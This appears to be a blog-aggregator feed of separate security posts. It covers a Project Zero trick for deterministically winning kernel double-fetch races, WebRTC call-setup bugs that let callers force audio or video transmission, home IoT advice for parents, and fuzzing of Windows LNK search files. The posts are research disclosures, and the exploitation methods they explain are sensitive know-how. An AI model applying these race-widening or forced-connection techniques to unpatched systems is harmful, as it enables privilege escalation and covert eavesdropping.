The key takeaway is that if between the double fetch points the code touches any user mode memory under your control which is not the one being double fetched it should be possible to convert that into a deterministic exploit. It doesn’t matter if the target system only has a single CPU, what the scheduling algorithm is in the kernel, how many instructions are between the double fetch points or what day of the week it is etc, it should “just work”.

The followup blog post on double-fetch exploitation gives some figures for exploitability. The examples shown up to now, when the right timing window is chosen the chance of success can hit 100% after some number of seconds. However, as shown here we can get 100% reliability on some classes of the same bug, but in the best case this isn’t an improvement other than it being deterministic.

All examples up to now only demonste the exploitation of what the blog post refers to as arithmetic races. The blog also mentions a second class of bug, binary races, which are harder to exploit and never reach 100% success. Let’s look at the example in the blog and see if our exploitation trick would do better.

PVOID* UserPointer = // controlled user-mode address

__try {

   ProbeForWrite(*UserPointer, sizeof(STRUCTURE), 1);①

   RtlCopyMemory(*UserPointer, LocalPointer, sizeof(STRUCTURE));②

} __except {

   return GetExceptionCode();

}

On the face of it this doesn’t look massively different to previous examples, however in this case the destination pointer is being changed rather than the size. The ProbeForWrite kernel API which checks the pointer is both at a user-mode address and the memory is writable. This is a commonly used idiom to verify a user supplied pointer is not pointing into kernel memory.

If the pointer value is changed between ① and ② from a user mode address to a kernel mode address the example would overwrite kernel memory. The behavior is harder to exploit with a probabilistic exploit as there are only two valid values of the pointer, either a user-mode address or a kernel mode address. If you’re brute forcing the pointer value then it’s possible to end up where both fetches read a user-mode pointer even though it might change to a kernel pointer in between the fetches.

Fortunately, due to the call to ProbeForWrite this is trivial to exploit if you can trap on user memory access as shown in the following diagram:

Diagram showing access to the UserPointer which is then passed to ProbeForWrite. We can generate a page fault when probing the buffer which can allow us to modify the original pointer.

From the diagram the first read from UserPointer is made ① and the resulting pointer value passed to ProbeForWrite. The ProbeForWrite API first checks if the pointer is in the user-mode address space, then probes each page of memory up to the size of the length parameter ②. If the page is invalid or is not writable then an exception will be generated and caught by the example's __except block. This gives us our exploit opportunity, we can use the exploitation trick on the one of the user-mode pages which is being probed which will cause ProbeForWrite to generate a page fault we can trap ③. However as the address being probed is not the same as the one storing the pointer we can modify it to contain a kernel mode address while the request is trapped ④. The result is we can deterministically win the race.

Of course I’ve been focussing on kernel double fetches as it’s what originally drew me to look for this behavior. There are many scenarios where this can be used to aid exploitation of user-mode applications. The most obvious one is where a service is sharing memory with a lower privileged application. An example of this sort of issue was a double-fetch in the DfMarshal COM marshaler. The COM marshaler shared a memory section between processes so it was possible to provide a section which exploited our trick. In the end this trick wasn’t necessary as the logic of the vulnerable code allowed me to create an infinite loop to extend the double fetch window. However if that didn't exist we could use this trick to detect and delay when the code was at the point where the handle could be switched.

Another more subtle use is where a privileged process reads memory from a less privileged process. This might be explicit use of APIs such as ReadProcessMemory or it could be indirect, for example querying for the process’ command line using NtQueryInformationProcess will read out memory locations under our control.

The thing to remember with this exploitation trick is it can be used to open up the window to win a timing race. In this case it’s similar to my previous work on oplocks, but instead for memory access. In fact the access to memory might be incidental to the vulnerable code, it doesn’t have to be a memory double fetch or necessarily even a TOCTOU vulnerability. For example you might be trying to win a race between two file paths with symbolic links. As long as the vulnerable code can be made to probe a user mode address we control then you can use it as a timing signal and to widen the exploitation window.

Conclusions

I’ve described an exploitation trick by combining SMB and the Cloud File API which can aid in demonstrating exploitation of certain types of the application and kernel vulnerabilities. It’s possible that there are other ways of achieving a similar result with APIs I haven’t looked at, but for now this is the best approach I’ve come up with. It allows you to trap on reads from user-mode memory, detect when the access occurs and delay the read for at least 60 seconds. Examples of code to implement the SMB and Cloud File API tricks are available here.

It’s worth just reiterating some more of the limitations of this exploitation trick before we conclude.

  • Can’t be used in a sandbox, only from a normal user privilege.
  • Only allows a one shot for any page mapped from the file. If something else (such as AV) tries to read that page or from the file then the trap may fire early.
  • Can’t detect the exact location of a read, limited to a granularity of 4KiB. For local access via the Cloud File API this will always populate the next 7 pages as well as part of the 32KiB read. If accessing a custom SMB server the read size can be reduced to 4KiB. Would prevent exploitation of certain bugs which require precise trapping only on a small area within a larger structure.
  • Can only detect writes indirectly, can’t specifically trap on a write.

From a practical perspective the trick presented here doesn’t significantly improve the win rates for traditional kernel double fetches outlined in the Bochspwn paper. Realistically for most of those classes of vulnerability you’d probably want to use a probabilistic approach, if anything due to its simplicity of implementation. However the trick is applicable to other bug classes where the memory trap is used as a deterministic timing signal adjunct to the vulnerability.

The one shot nature of the trick also makes it of no real benefit to exploiting simple double fetch code paths. Also more complex code which might read and write to a memory address more than once before you get to the vulnerable code which might make managing traps more difficult.

The State of State Machines

By: Ryan
19 January 2021 at 17:28

Posted by Natalie Silvanovich, Project Zero

On January 29, 2019, a serious vulnerability was discovered in Group FaceTime which allowed an attacker to call a target and force the call to connect without user interaction from the target, allowing the attacker to listen to the target’s surroundings without their knowledge or consent. The bug was remarkable in both its impact and mechanism. The ability to force a target device to transmit audio to an attacker device without gaining code execution was an unusual and possibly unprecedented impact of a vulnerability. Moreover, the vulnerability was a logic bug in the FaceTime calling state machine that could be exercised using only the user interface of the device. While this bug was soon fixed, the fact that such a serious and easy to reach vulnerability had occurred due to a logic bug in a calling state machine -- an attack scenario I had never seen considered on any platform -- made me wonder whether other state machines had similar vulnerabilities as well. This post describes my investigation into calling state machines of a number of messaging platforms, including Signal, JioChat, Mocha, Google Duo, and Facebook Messenger.

WebRTC and State Machines

The majority of video conferencing applications are implemented using WebRTC, which I’ve discussed in several past blog posts.  WebRTC connections are created by exchanging call set-up information in Session Description Protocol (SDP) between peers, a process which is called signalling. Signalling is not implemented by WebRTC, which allows peers to exchange SDP in whatever secure communication message is available to them, usually WebSockets for web applications, and secure messaging for messaging applications.

There are a few types of SDP that can be exchanged by WebRTC peers. In a typical connection, the caller starts off by sending an SDP offer, and then the callee responds with an SDP answer. These messages contain most information that is needed to transmit and receive media, including codec support, encryption keys and much more. After the offer/answer exchange, peers can send SDP candidates to other peers. Candidates are potential network paths that the two peers can use to connect to each other, and SDP candidates contain information such as IP addresses and TURN servers. Peers usually send more than one candidate to a peer, and candidates can be sent at any time during a connection.

WebRTC connections maintain an internal state related to whether an offer or answer has been received and processed, however, applications that use WebRTC usually have to maintain their own state machine to manage the user state of the application. How the user state maps to the WebRTC state is a design choice made by the WebRTC integrator, which has both security and performance consequences. For example, some applications do not exchange any SDP until the callee user has interacted with the application to answer the call, meanwhile others set up the peer-to-peer connection, and start sending audio and video from caller to callee before the callee is even notified of the call.

Regardless of design, transmitting audio or video from an input device must be directly enabled by application code using WebRTC. This is usually done using a feature called tracks. Every input device is considered a ‘track’, and each specific track must be added to a specific peer connection by calling addTrack (or language equivalent) before audio or video is transmitted. Tracks can also be disabled, which is useful for implementing mute and camera-off features. Each track also has an RTPSender property that can be used to fine-tune the properties of transmission, which can also be used to disable audio or video transmission.

Theoretically, ensuring callee consent before audio or video transmission should be a fairly simple matter of waiting until the user accepts the call before adding any tracks to the peer connection. However, when I looked at real applications they enabled transmission in many different ways. Most of these led to vulnerabilities that allowed calls to be connected without interaction from the callee.

Signal Messenger

I looked at Signal in September 2019, and at that time, the application had a calling setup that is very similar to what is recommended in WebRTC documentation.

A peer-to-peer connection is established, and then the callee's audio track is added to the connection when the callee accepts the call by interacting with the user interface. Then a message is sent to the caller via the peer-to-peer connection, telling it to also move to the connected state and add the track.

Unfortunately, the application didn’t check that the device receiving the connect message was the caller device, so it was possible to send a connect message from the caller device to the callee. This caused the audio call to connect, allowing the caller to hear the callee’s surroundings. I tested this bug by changing Signal’s open-source code to send the message and recompiling the attacking client.

This vulnerability was fixed in the client in September 2019, and since then, Signal’s signalling code has been replaced by the ringrtc project, which uses a more conservative state machine.

This bug was purely in Signal’s code, and was not due to a misunderstanding of WebRTC functionality. The state machine design was largely effective requiring user consent to transmit audio, but a specific check was not implemented.

JioChat and Mocha

I accidentally found two very similar vulnerabilities in JioChat and Mocha messengers in July 2020 while testing whether a WebRTC exploit would work on them. They both had a similar signalling design, which was server-mediated.

The offer and answer are exchanged via the server, and then both the caller and the callee send their candidates to the server. The server then stores them until the callee interacts with their device and accepts the call. Then the peer-to-peer connection is created, and when WebRTC enters into its internal connected state, the track is added, causing audio and video to be transmitted.

This design has a fundamental problem, as candidates can be optionally included in an SDP offer or answer. In that case, the peer-to-peer connection will start immediately, as the only thing preventing the connection in this design is the lack of candidates, which will in turn lead to transmission from input devices. I tested this by using Frida to add candidates to the offers created by each of these applications. I was able to cause JioChat to send audio without user consent, and Mocha to send audio and video. Both of these vulnerabilities were fixed soon after they were filed by filtering SDP on the server.

These issues were caused by a misunderstanding of how WebRTC works coupled with an attempt to improve WebRTC performance with an unusual signalling design. Normally, WebRTC integrators have to decide whether to wait until the callee has answered the call to set up the peer-to-peer connection. Setting the connection up early improves performance and prevents the user from having to wait when they answer a call, but also greatly increases the remote attack surface of WebRTC. These applications tried to improve performance without the security cost with this design, but didn’t consider all the ways that WebRTC can start a peer-to-peer connection.

It is generally not a good idea for integrators to gate audio or video transmission on any WebRTC feature that is not adding or enabling tracks. To start, many WebRTC features are complex, so it is easy to make a mistake that allows audio or video to be transmitted. Also, if the feature that is gated on is not commonly-used or not a security feature, it could be poorly tested or changed in the future.

Duo

I looked at Google Duo in September 2020. Duo’s signalling methodology is somewhat different from a lot of messengers because it supports a feature that allows the callee to preview the caller’s video before answering. So a one-way video stream needs to be set up before the call is answered.

The image above shows the setup of the one-way video stream. Dotted lines represent asynchronous calls made using Java executors. The lack of transmission from callee to caller is enforced by two methods. First, the SDP offer contains the property a=sendonly for video, which causes video to only be transmitted in one direction. Also, when the callee receives the offer from the caller, it adds the video track to the peer connection, but then disables it using the RTPSender property of the track (the audio track is not added or enabled until the user accepts the call).

Neither of these methods effectively prevents video from being transmitted from callee to caller. The SDP property is easy to get around because the caller provides the SDP to the callee, so it can be easily altered. Disabling the video track as soon as the offer is processed should work, except for the asynchronous design. Normally, the setLocalDescription method (which processes the SDP offer) calls the callback onSetSuccess, and then sets up the peer-to-peer connection after the callback has finished. However, if the callback makes another asynchronous call, the guarantee that onSetSuccess finishes before the connection is set up no longer holds, because the setLocalDescription method only waits for the onSetSuccess thread to finish. This creates a race between disabling the video and setting up the connection, so in some situations, the callee could transmit a few video frames to the caller before transmission is disabled.

I tested this by using Frida to alter the SDP sent by the callee, and then I tried many methods to win the race. It turned out to be fairly hard to win, and I spent roughly two weeks trying to figure out how to slow down the video disable call enough to give the connection time to set up. I ended up sending multiple offers and adding candidates to the offers, which decreased the connection time, as the network connection was already established. Then I sent many messages that take a long time to process through the data channel of the peer-to-peer connection to slow down the disabling of the video track. Data messages are processed on the same thread queue as disabling the video track in Duo, so sending data messages filled up the queue that was needed to disable video with many other entries, delaying the track being disabled.

This bug was fixed in December 2020 by removing the asynchronous call from onSetSuccess. While Duo generally designed signalling in a way that is effective in preventing video transmission from callee to caller, implementing the design asynchronously introduced problems. Asynchronous signalling implementations are becoming more common on mobile applications, as there are many unpredictable situations in which WebRTC needs to wait on the network or a peer, and separating function calls into different threads means a delay in one call won’t affect unrelated functionality. However, asynchronous calls make it more difficult to model how a state machine will behave in all situations, so it is important to be cautious about adding asynchronous calls to WebRTC signalling. In this case, the asynchronous call to disable the video track added nothing in terms of performance, as there is no reason any of the calls made to disable the track could block, and onSetSuccess already runs in its own thread and can yield to higher priority threads. It’s important to balance the risk and benefit of asynchronous calls and not indiscriminately include them in an application.

Facebook Messenger

I looked at Facebook Messenger in October 2020. It was a fairly challenging target because of the amount of reverse engineering required. Stepping back a bit, WebRTC has bindings in several programming languages which allow it to be integrated into applications using that language. Most Android applications that integrate WebRTC use the Java bindings. This makes investigating signalling state machines fairly straightforward, as important Java functions, such as setLocalDescription (which processes offers and answers), addRemoteIceCandidate (which processes candidates) and addTrack (which adds tracks to connections) can be hooked in Frida and logged for analysis. It is also reasonably straightforward to change the behavior of the attacker device using these calls.

Facebook Messenger does not use Java bindings to integrate WebRTC, instead it uses C++ bindings. Moreover, it statically links WebRTC to a larger library (librtcR20.so, which is likely the rsys library mentioned in this article), so the symbols for calls to bindings get stripped, making them difficult to hook. In addition, Facebook Messenger serializes SDP into another format before it is transmitted, so it is difficult to determine how signalling works by monitoring traffic.

I eventually realized that the only reasonable way to figure out how Facebook Messenger signalling works was to figure out its network protocol. Thankfully, Facebook has publicly stated that they use fbthrift, a branch of thrift. I loaded the librtcR20.so library into IDA to see if I could find where it called into the thrift library, but while there were a few calls, it looked like the code was mostly statically linked. I eventually figured out that this is because thrift generates serialization code for every protocol implemented, so most of the serialization and deserialization code ends up compiled with the protocol processing code. So I decided to compile fbthrift, make a sample serializer and look at it in IDA, so I could get an impression of what compiled fbthrift serializers look like. I noticed that during serialization, members of an object are serialized by calling a method called writeFieldBegin. I also noticed that when this method is called, the field name is required, even though it is usually not included in the serialized output. So I looked for a function in librtcR20 that was very frequently called with different string parameters that seemed reasonable for field names. Not very many functions fulfilled that criteria, so I was able to identify writeFieldBegin.

At this point, I could find many places where objects are serialized, and needed to identify which one was the message used to set up WebRTC calls.

Earlier, I’d noticed a method in the library called P2PCall::OnP2PMessageFromPeer (note that the symbol for this method is stripped, but the method name is logged when it is called). This seemed a likely place that a deserialized message would be processed. Searching for the string “P2PMessage”, I found the serialization code for a type called P2PMessageRequest. I assumed that this was where call setup messages were created.

Thrift serialization code is generated based on class definitions in a thrift definition file. Based on the field names and types passed to writeFieldBegin, I was able to slowly reverse engineer the complete thrift definition for this type. It was tedious work, because the definition was fairly long, and the code is obfuscated in a way that makes register use inconsistent, so I wasn’t confident that any automated approach would be accurate.

Below is a sample of the serialization code.

Notice that it writes two fields from an object of type Extmap. The first, named id, is a mandatory field. The function that writes the code is as follows.

The field identifier written is 1, and the field type is 8, which translates to i32 (32-bit integer). The second field is an optional field, and the registers to write it are set in the following code.

This sets the field name to uri, the field identifier to 2, and the field type to 8 (also i32). All together, this code can be represented by the following thrift definition.

```

struct Extmap{

        1: i32 id

        2: optional i32 uri

}

```

After similarly reverse engineering every field of the P2PMessageRequest type, I had a complete thrift definition, available here.

I did two things with this thrift definition.  First, I used it to determine the layout of the P2PMessageRequest type in C++. This was extremely valuable, as it allowed me to load the struct definition into IDA with every single field named correctly. This made it much easier to understand how incoming messages are handled in P2PCall::OnP2PMessageFromPeer. This ended up being a bit of a process. fbthrift can generate C++ header files directly from a thrift definition, but these are very long and contain a lot of unnecessary definitions, and can not be processed by IDA. So I ended up compiling the generated source and loading it into IDA, and then exporting the structure definitions and importing them into another IDA instance where librtcR20.so was already loaded. A few fields had different sizes in my compilation versus Facebook’s, but it was close enough that I could get it to work with a few modifications.

Below is an example of code decompiled in IDA with the thrift definition imported, to give an idea of how much easier it makes it to understand the processing of the message object.

I was also able to decode and generate messages sent over the network. To do this, I generated the serialization code from the thrift definition in Python, as thrift supports code generation in many languages. Then, I was able to import this code when using Frida Python to hook functions in Facebook Messenger.

Then I needed to find the code that handled incoming P2PMessageRequest messages. Since these messages are handled by native code, meanwhile most Facebook messages are handled by Java code, I looked for a native call with an appropriate name. I found com.facebook.webrtc.WebrtcEngine.onThriftMessageFromPeer. I hooked this method with Frida, and fed its byte array parameter in the generated deserializer, and it decoded incoming messages.

I found a similar method used to send thrift messages, sendThriftToPeer (this method’s class name is obfuscated and changes in every version of Facebook Messenger, but it can be found by grepping the application’s smali). I was also able to hook this method, and alter its byte array parameter, to change a P2PMessageRequest message sent by Facebook Messenger.

Now, I was able to understand Facebook Messenger’s signalling state machine. There are two different ways that signalling can occur, depending on where the user is signed into Facebook Messenger. If the user is signed in on multiple devices or browsers, very little happens before the callee interacts with their device. The offer, answer and candidates are exchanged, but they are stored by the callee device and not processed until the callee user answers the call. This makes sense, because Facebook Messenger doesn’t know what device to connect to otherwise.

If the callee is only signed in on a single device, the state machine is more interesting.

In this case, Facebook Messenger enables the track as soon as an offer is received, but alters the offer so that all outgoing streams are inactive. It then replaces the offer with one where they are active when the user interacts with the device.

I was concerned that there might be a way to bypass the alteration of the offer, but I looked at how this was done, and while I generally don’t recommend using anything other than adding or disabling tracks to disable input device transmission, it was fairly robust. The offer is altered after the SDP is decoded into an internal WebRTC object, and the changes are made directly to this object, which eliminates the possibility of parsing errors.

However, looking at how incoming messages are handled, I noticed that many message types other than offers, answers and candidates are processed before the call is answered. One type that stood out was called SdpUpdate. When an SdpUpdate message is received, the local offer or answer is updated by calling setLocalDescription.

This message type didn’t do anything when sent to the state machine above, as it is already storing SDP and waiting to call setLocalDescription. But in the situation where the user is logged into two devices, it caused setLocalDescription to be called and started the audio connection.

It is not clear what the SdpUpdate message type is used for in Facebook Messenger. I tried many scenarios on my test devices, including network switchover, and was not able to generate one in normal use. Regardless, it is clear that it was not intended for this message type to be received before the call is answered. It is similar to the Signal bug described above, in that it is not related to the application’s use of WebRTC, but due to a missing check when handling input that can cause state transitions.

This vulnerability was fixed in November 2020 with server changes that prevent this message type from being sent before a call is connected.

Other Applications

There were a few other applications I looked at and did not find problems with their state machines. I looked at Telegram in August 2020, right after video conferencing was added to the application. I did not find any problems, largely because the application does not exchange the offer, answer or candidates until the callee has answered the call. I looked at Viber in November 2020, and did not find any problems with their state machine, though challenges reverse engineering the application made this analysis less rigorous than the other applications I looked at.

Discussion

The majority of calling state machines I investigated had logic vulnerabilities that allowed audio or video content to be transmitted from the callee to the caller without the callee’s consent. This is clearly an area that is often overlooked when securing WebRTC applications.

The majority of the bugs did not appear to be due to developer misunderstanding of WebRTC features. Instead, they were due to errors in how the state machines are implemented. That said, a lack of awareness of these types of issues was likely a factor. It is rare to find WebRTC documentation or tutorials that explicitly discuss the need for user consent when streaming audio or video from a user’s device.

Many of these state machines had needless complexity in how they handled call set-up, which was also a factor. Unnecessary threading, reliance on obscure features and large numbers of states and input types increase the likelihood of this type of vulnerability occurring in a signalling state machine.

It is also concerning to note that I did not look at any group calling features of these applications, and all the vulnerabilities reported were found in peer-to-peer calls. This is an area for future work that could reveal additional problems.

Conclusion

I investigated the signalling state machines of seven video conferencing applications and found five vulnerabilities that could allow a caller device to force a callee device to transmit audio or video data. All these vulnerabilities have since been fixed. It is not clear why this is such a common problem, but a lack of awareness of these types of bugs as well as unnecessary complexity in signalling state machines is likely a factor. Signalling state machines are a concerning and under-investigated attack surface of video conferencing applications, and it is likely that more problems will be found with further research.

Two Pink Lines

15 January 2021 at 18:58

Depending on your life experiences, the phrase (or country song by Eric Church) “two pink lines” may bring up a wide range of powerful emotions.    I suspect, like many fathers and expecting fathers, I will never forget the moment I found out my wife was pregnant.  You might recall what you were doing, or where you were and maybe even what you were thinking.   As a professional ethical hacker, I have been told many times – “You just think a little differently about things.”   I sure hope so, since that’s my day job and sure enough this experience wasn’t any different.  My brain immediately asked the question, “How am I going to ensure my family is protected from a wide range of cyberthreats?”   Having a newborn opens the door to all sorts of new technology and I would be a fool not to take advantage of all devices that makes parenting easier.   So how do we do this safely?

The A-B -C ‘s

The security industry has a well-known concept called the “principle of least privilege. “This simply means that you don’t give a piece of technology more permissions or access than it needs to perform its primary function.   This can be applied well beyond just technology that helps parents; however, for me it’s of extra importance when we talk about our kids.  One of the parenting classes I took preparing for our newborn suggested we use a baby tracking phone app.   This was an excellent idea, since I hate keeping track of anything on paper.  So I started looking at a few different apps for my phone and discovered one of them asked for permission to use “location services,” also known as GPS, along with access to my phone contacts.  This caused me to pause and ask: Why does an app to track my baby’s feeding schedule need to know where I am?  Why does it need to know who my friends are?   These are the types of questions parents should consider before just jumping into the hottest new app.  For me, I found a different, less popular app which has the same features, just with a little less access.

It’s not always as easy to just “find something else.”  In my house, “if momma ain’t happy, nobody is happy.”  So, when my wife decided on a specific breast pump that came with Bluetooth and is internet enabled, that’s the one she is going to use.   The app backs up all the usage data to a server in the cloud.   There are many ways that this can be accomplished securely, and it is not necessary a bad feature, but I didn’t feel this device benefited from being internet connected.   Therefore, I simply lowered its privileges by not allowing it internet access in the settings on her phone.  The device works perfectly fine, she can show the doctor the data from her phone, yet we have limited our online exposure and footprint just a little more.  This simple concept of least privilege can be applied almost everywhere and goes a long way to limiting your exposure to cyber threats.

Peek-A-Boo

I think one of the most sought after and used products for new parents is the baby monitor or baby camera.   As someone who has spent a fair amount of time hacking cameras (or cameras on wheels) this was a large area of concern for me.  Most cameras these days are internet connected and if not, you often lose the ability to view the feed on your phone, which is a huge benefit to parents.  So how, as parents, do we navigate this securely?  While there is no silver bullet here, there are a few things to consider.    For starters, there are still many baby cameras on the market that come with their own independent video screen.  They generally use Wi-Fi and are only accessible from home.  If this system works for you, use it.  It is always more secure to have a video system which is not externally accessible.   If you really want to be able to use your phone, consider the below.

  • Where is the recorded video and audio data being stored? This may not seem important if the device is internet connected anyway, but it can be.  If your camera data is being stored locally (DVR, SD card, network storage, etc.), then an attacker would need to hack your specific device to obtain this information.   If you combine this with good security hygiene such as a strong password and keeping your device updated, an attacker has to work very hard to access your camera data.  If we look at the alternative where your footage is stored in the cloud, and it becomes subject to a security breach, now your camera’s video content is collateral damage.  Large corporations are specifically targeted by cybercriminals because they provide a high ROI for the time spent on the attack; an individual practicing good cybersecurity hygiene becomes a much more difficult target providing less incentive for the attacker, thus becoming a less likely target.
  • Is the camera on the same network as the rest of your home? An often-overlooked security implication to many IoT devices, but especially cameras, is outside of the threat of spying, but rather the threat of a network entry point. If the camera itself is compromised it can be used as a pivot point to attack other devices on your network.  A simple way to reduce this risk is to utilize the “guest” network feature that comes by default on almost all home routers.   These guest networks are preset to be isolated from your main network and generally require little to no setup.  By simply attaching your cameras to your guest network, you can reduce the risk of a compromised camera leading a cybercriminal to the banking info on your laptop.

Background checks – Not only for babysitters

Most parents, especially new ones, like to ensure that anyone that watches their children is thoroughly vetted.  There are a ton of services out there to do this for babysitters and nannies, however it’s not always as easy for vetting the companies that create the devices we put in our homes.  So how do we determine what is safe?  My father used to tell me: “It’s how we respond to our mistakes that makes the difference.”  When researching a company or device, should you find that the device has been found to have a vulnerability, often the response time and accountability from the vendor can tell you if it’s a company you should be investing in. Some things to look for include:

  • Was the vulnerability quickly patched?
  • Are there unpatched bugs still?
  • Has a vendor self-reported flaws, fixed them and reported to the public they have been fixed?
  • Are there numerous outstanding bugs filed against a company or device?
  • Does the company not recognize the possibility of bugs in their products?

These answers can often be discovered on a company’s website or in release notes, which are generally attached to an update of a piece of software.   Take a minute to read the notes and see if the company is making security updates. You don’t need to understand all the details, just knowing they take security seriously enough to update frequently is important.  This can help tip the scales when deciding between devices or apps.

Remember, you can do this!

Through my preparation for becoming a new parent, I constantly read in books and was told by professionals, “Remember, you can do this!”  Cybersecurity in the context of being a parent is no different.  Every situation is different, and it is important to do what works with you and your family.  As parents, we shouldn’t be afraid to use all the cool new gadgets that are emerging on the market, but instead educate ourselves on how to limit our risk.  Which features do I need, which ones can I do without?   Remember always follow a vendor’s recommendations and best practices, and of course remember to breathe!

The post Two Pink Lines appeared first on McAfee Blog.

Some DOS bugs while processing Microsoft LNK files

By: linhlhq
30 June 2020 at 01:27

As mentioned in the article about CVE-2020-1299 [1], this article I will present some bugs I found in processing the "LNK search" file of windows. In the article I will introduce pe-afl [2], a fuzzer I usually use instead of Winafl when Winafl is unstable on newer versions of windows.

 

The bugs I present below are not fixed, but this blog I wrote at the suggestion of MSRC, they will prepare every answer with customer questions around these unresolved bugs.


Introduction


I will use pe-afl to fuzz the "LNK search" file format, this is the file format I ignored until the ZDI public blog analyzed the error related to this file format [3], about the file structure "LNK search" is very clear in ZDI's blog (I think it is too complicated, I don't read much about it, lol).


Pe-afl


As I mentioned a lot that Winafl does not work well on new windows versions, plus Winafl using dynamic instruments to calculate coverage will result in overhead, which reduces performance.


Pe-afl is a fuzzer built on the AFL used for binary close sources. It uses static instruments to calculate coverage and feedback-driven. A static instrument is always better than a dynamic instrument. However, currently pe-afl only supports instruments for 32-bit binaries and has some limitations because not every binary can be instrumental (most binaries built with visual studio can be instrumental). This is an introduction slide for pe-afl [4] [5].

 

About using pe-afl is similar to Winafl, except that Winafl requires Dynamorio to calculate coverage + feedback-driven and pe-afl does not. Pe-afl will use IDA to find basic blocks, which are highlighted as shown in the picture.



Then pe-afl will insert the code at the beginning of these basic blocks to mark coverage. Binary instrumented by pe-afl is similar to afl-gcc instrument when building a program.



For pe-afl we will instrument the DLLs or even the EXE executables we want fuzz (pe-afl also supports fuzz, instrument kernel .sys). Then the fuzzer will do everything from calculating the coverage, feedback-driven like afl.



Windows.storage.search.dll and StructuredQuery.dll

 

Here I debug with the harness I used to fuzz in the previous article [1], I found the program also loads 2 more DLLs: windows.storage.search.dll and StructuredQuery.dll to parsing a file “LNK search”.



I want to use pe-afl to fuzz both DLLs, not just StructuredQuery.dll alone. However, if we use pe-afl to fuzz, we can only cover one module, so in order to cover more modules, I decided to fix a bit of pe-afl's source.

 

Pe-afl uses an array of 65536 bytes to store coverage for a module, so I doubled the size of this array to be able to cover another module. This way is quite simple but affects the running speed of fuzzer a lot. I don't know what Dynamorio used to cover multiple modules at a time, but for now, I can only use this simple method. I fixed the maximum pe-afl coverage to 3 modules at a time. In addition, I also integrated afl-fast [6] of @thuanpv_ and afl-mopt [7] (inspired by afl++ [8]).



Above is one of the pieces of code I modify pe-afl. Check how it works after I fix it with afl-showmap:



Now everything is available, but the most important thing is that corpus is not available. Corpus about the "LNK search" file format is not mentioned anywhere on the internet. The only way here is to create it manually. I use the search interface of Explorer, creating enough search cases under conditions such as Date, kind, size, ... but also only create about 200 files (boring work makes me impatient).



I then use afl-cmin to reduce the number of corpus and start fuzz. I use pe-afl fuzz on 2 DLLs that are windows.storage.search.dll and structuredquery.dll, after 1 week I checked the crash that fuzzer found and had 3 unique crashes:

-       Stack overflow (0xc00000fd)

-       2 null pointer dereference

 

All three crashes appear in structuredquery.dll and can cause explorer.exe to crash.

I reported to Microsoft but they said that these errors only caused DOS temporarily they would not fix. However, in my opinion, due to the nature of the LNK file, the default explorer will automatically handle them. For ordinary users who encounter these cases, it is often not clear the cause to fix (simply delete it but due to a continuous crash it will be very difficult to manipulate).



Conclusion

 

Above are some errors I found for the "LNK search" file format, I will not publish these DOS POCs, but if someone reads this blog and follow it, it can easily get those POCs, even there may be errors that cause RCE that I cannot find (I think there are still errors that exist in processing LNK files). Windows users should protect themselves, not arbitrarily download file formats such as LNK, maybe your computer will be exploited as soon as this file is saved.

 

[1] https://blog.vincss.net/2020/06/cve49-microsoft-windows-lnk-remote-code-execution-vuln-cve-2020-1299-eng.html

[2] https://github.com/wmliang/pe-afl

[3] https://www.zerodayinitiative.com/blog/2020/3/25/cve-2020-0729-remote-code-execution-through-lnk-files

[4] https://www.slideshare.net/wmliang/make-static-instrumentation-great-again-high-performance-fuzzing-for-windows-system

[5] https://www.youtube.com/watch?v=OipNF8v2His

[6] https://github.com/mboehme/aflfast

[7] https://github.com/puppet-meteor/MOpt-AFL

[8] https://github.com/AFLplusplus/AFLplusplus


--------------


Vietnamese version


Như đã đề cập ở bài viết về CVE-2020-1299 [1], bài này tôi sẽ trình bày 1 số lỗi tôi tìm thấy trong quá trình xử lý file LNK search của windows. Trong bài viết tôi sẽ giới thiệu pe-afl [2], 1 fuzzer tôi thường sử dụng thay thế winafl khi mà winafl chạy không ổn định trên các phiên bản windows mới hơn.

 

Những lỗi tôi trình bày dưới đây đều không được fix nhưng blog này tôi viết theo gợi ý của MSRC, họ sẽ chuẩn bị mọi câu trả lời với những câu hỏi của khách hàng quanh những lỗi không được fix này.


Introduction


Tôi sẽ sử dụng pe-afl để fuzz định dạng file LNK search, đây là định dạng file tôi đã bỏ qua mãi cho đến khi ZDI public blog phân tích lỗi liên quan đến định dạng file này [3], về cấu trúc file LNK search trong blog của ZDI nói rất rõ (tôi nhận định rằng nó quá phức tạp, tôi đọc cũng không đọng lại được gì nhiều).


Pe-afl


Như tôi đã đề cập rất nhiều rằng winafl chạy không ổn định trên các windows version mới, cộng thêm việc winafl sử dụng dynamic instrument để tính coverage thì sẽ xảy ra overhead, hiệu năng giảm.


Pe-afl là 1 fuzzer được xây dựng dựa trên afl sử dụng đối với các binary close source. Nó sử dụng static instrument để tính coverage và feedback driven. Tất niên static instrument sẽ luôn luôn tốt hơn dynamic instrument. Tuy nhiên hiện tại pe-afl chỉ hỗ trợ instrument đối với các binary 32 bit và có 1 số hạn chế vì không phải binary nào cũng có thể instrument được (đa số các binary được build với visual studio đều có thể instrument được). Đây là slide giới thiệu về pe-afl [4] [5].

 

Về cách sử dụng pe-afl cũng gần tương tự như winafl, chỉ khác cái là winafl cần có Dynamorio để tính coverage + feeback driven còn pe-afl thì không. Pe-afl sẽ sử dụng IDA để tìm các basic-block, các basic-block được highlight như ở trong hình.



Sau đó pe-afl sẽ chèn những đoạn code tại đầu các basic-block này để đánh dấu coverage. Binary được instrument bởi pe-afl cũng tương tự như afl-gcc instrument khi build 1 chương trình.



Đối với pe-afl ta sẽ instrument những DLL hay thâm chí là những file thực thi exe mà chúng ta muốn fuzz (pe-afl cũng hỗ trợ fuzz, instrument kernel .sys). Sau đó fuzzer sẽ làm mọi việc từ tính toán coverage, feeback driven giống như afl.



Windows.storage.search.dll and StructuredQuery.dll

 

Ở đây tôi debug với harness tôi sử dụng để fuzz ở bài viết trước [1], tôi nhận thấy chương trình còn load thêm 2 dll là windows.storage.search.dll và StructuredQuery.dll để parsing 1 file LNK search.



Tôi muốn sử dụng pe-afl để fuzz cả 2 DLL trên, chứ không chỉ 1 mình StructuredQuery.dll. Tuy nhiên nếu sử dụng pe-afl để fuzz thì chúng ta chỉ có thể coverage được 1 module, để có thể coverage được nhiều module hơn tôi quyết định sửa 1 chút source của pe-afl.

 

